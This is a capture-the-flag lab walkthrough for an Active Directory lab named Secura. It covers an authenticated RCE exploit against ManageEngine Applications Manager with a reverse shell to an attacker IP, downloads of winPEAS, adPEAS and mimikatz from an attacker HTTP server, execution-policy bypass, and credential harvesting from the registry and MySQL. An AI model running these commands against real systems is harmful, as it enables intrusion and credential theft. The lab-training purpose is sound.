
Secura

Network

Given:

  • 192.168.180.0/24

Found:

  • 192.168.180.95
  • 192.168.180.96
  • 192.168.180.97 / DC01

Creds

admin:admin (applications manager portal)
administrator:Reality2Show4!.? (local admin on 192.168.180.95)
apache:New2Era4.! (local account on 192.168.180.96)
administrator:Almost4There8.? (local account on 192.168.180.96, found in MySQL on 192.168.180.96)
charlotte:Game20n4.! (MySQL on 192.168.180.96)

other users:
michael

Enumeration

Ping sweeping the subnet gives us three machines.

192.168.180.95

Enumeration

Browsing to port 5001 shows that the actual web application is served on port 44444.

On port 44444, we can see the main page of the service: Applications Manager by ManageEngine.

Clicking on "First time user?" gives us the default credentials admin:admin.

Inside, we can see the application panel.

Initial Access

Searching for vulnerabilities in Applications Manager, we try the authenticated RCE exploit from Exploit-DB: https://www.exploit-db.com/exploits/48793

We have to edit the script and change the Java version to 8 for the script to work.

Start a listener on port 6666 and execute the script like this:

$ python rce.py http://192.168.180.95:44444 admin admin 192.168.45.229 6666

And we get a shell.

Post Exploitation

We transfer winPEAS and adPEAS to the host with a Python HTTP server on the attacker side and Invoke-WebRequest (iwr) on the target.

To run the .ps1 script we need to get around the PowerShell execution policy, which blocks unsigned scripts by default (a convenience default, not a security boundary):

powershell -ep bypass

Then import adPEAS and invoke it:

We find charlotte, who is a member of the Remote Management Users group. That group grants WinRM access (not RDP), so we can log in with her account over WinRM.

After that, we execute winPEAS.
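The transfer-and-run procedure above, as one added example (these are not the page's own commands). It assumes the attacker host is 192.168.45.229 (the address used for the reverse shell) serving the tools with `python3 -m http.server 80`, and that the files are named adPEAS.ps1 and winPEASx64.exe; both names and the C:\Windows\Temp drop path are assumptions.

```powershell
# Added example, not the original writeup's commands. Assumes the attacker
# host 192.168.45.229 serves the tools from its current directory with:
#     python3 -m http.server 80
# File names adPEAS.ps1 / winPEASx64.exe and the drop path are assumptions.

# Equivalent of `powershell -ep bypass`, applied to this process only. The
# execution policy is not a security boundary; it only stops unsigned .ps1
# files from running by default.
Set-ExecutionPolicy -ExecutionPolicy Bypass -Scope Process -Force

$attacker = 'http://192.168.45.229'
$dest     = 'C:\Windows\Temp'   # writable by every user; adjust if needed

# Pull both tools with Invoke-WebRequest (alias: iwr).
foreach ($tool in 'adPEAS.ps1', 'winPEASx64.exe') {
    Invoke-WebRequest -Uri "$attacker/$tool" -OutFile (Join-Path $dest $tool)
}

# adPEAS: domain enumeration. Its output includes group memberships, which
# is where a user in Remote Management Users (WinRM access) shows up.
Import-Module (Join-Path $dest 'adPEAS.ps1')
Invoke-adPEAS

# winPEAS: local enumeration. 'quiet' drops the banner. Save the output so
# it can be searched afterwards; autologon values are reported from the
# Winlogon registry key.
$winpeas = Join-Path $dest 'winPEASx64.exe'
$report  = Join-Path $dest 'winpeas.txt'
& $winpeas quiet | Out-File -FilePath $report -Encoding utf8
Select-String -Path $report -Pattern 'AutoLogon|DefaultPassword' -Context 1,3
```

Dropping files into C:\Windows\Temp is fine in a lab; on a real engagement pick a path that matches the rules of engagement and clean it up afterwards.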

winPEAS finds autologon credentials for Administrator stored in the Winlogon registry values.

It also lists all local users and groups.

Transfer mimikatz to the machine and:

Checking the recovered credentials with CrackMapExec (CME) shows that they belong to a local account on the other machine (192.168.180.96), not a domain account.

Trying WinRM with them, we can log in to that host as the local account.

To get the flag on this host, use evil-winrm as the local Administrator.

192.168.180.96

Enumeration

Initial Access

Connect to this machine with evil-winrm using the credentials found on 192.168.180.95.

Privilege Escalation

We find a XAMPP folder containing the MySQL binaries, and the current user is allowed to execute them.

From the database we get administrator:Almost4There8.? and charlotte:Game20n4.!.
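One way to pull those credentials out of the XAMPP database, as an added example (not the page's own commands): it uses XAMPP's mysql.exe to list the non-builtin databases, looks in information_schema for columns that look like logins or passwords, and dumps the matching tables. Assumptions: XAMPP lives at C:\xampp and the root account has XAMPP's default empty password (set $mysqlPass otherwise); no table or column names are given on the page, so none are guessed.

```powershell
# Added example, not the original writeup's commands. Hunts for credentials
# in the local XAMPP MySQL instance. Assumptions: XAMPP at C:\xampp, root
# with the default empty password (set $mysqlPass if not). Table/column
# names are discovered from information_schema, not assumed.
$mysql     = 'C:\xampp\mysql\bin\mysql.exe'
$mysqlUser = 'root'
$mysqlPass = ''

$auth = @('-u', $mysqlUser)
if ($mysqlPass) { $auth += "--password=$mysqlPass" }

function Invoke-MySql([string]$Query) {
    # -N: no column headers, so each output line is one tab-separated row.
    & $mysql @auth -N -e $Query
}

$builtin = 'information_schema', 'mysql', 'performance_schema', 'phpmyadmin', 'test', 'sys'
$dbs = Invoke-MySql 'SHOW DATABASES;' | Where-Object { $_ -notin $builtin }

foreach ($db in $dbs) {
    # Tables with a column that looks like it holds a login or password.
    $tables = Invoke-MySql @"
SELECT DISTINCT table_name FROM information_schema.columns
WHERE table_schema = '$db'
  AND (column_name LIKE '%pass%' OR column_name LIKE '%pwd%'
       OR column_name LIKE '%user%' OR column_name LIKE '%login%');
"@
    foreach ($table in $tables) {
        "== $db.$table"
        # Dump the table; the password may be plain text (as here) or a
        # hash that still needs cracking.
        & $mysql @auth -e "SELECT * FROM $db.$table LIMIT 50;"
    }
}
```

If root does need a password, XAMPP's phpMyAdmin config (C:\xampp\phpMyAdmin\config.inc.php) usually has it in plain text, which is worth checking before anything else.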

Post Exploitation

We reconnect as administrator and get the flag.

192.168.180.97

Enumeration

We can see that this host is the domain controller called dc01.secura.yzx.

Charlotte's credentials should work with evil-winrm here, but the connection fails because of the lab's instability.

Bug

I couldn't finish this lab even after following the walkthroughs. The lab is super unstable.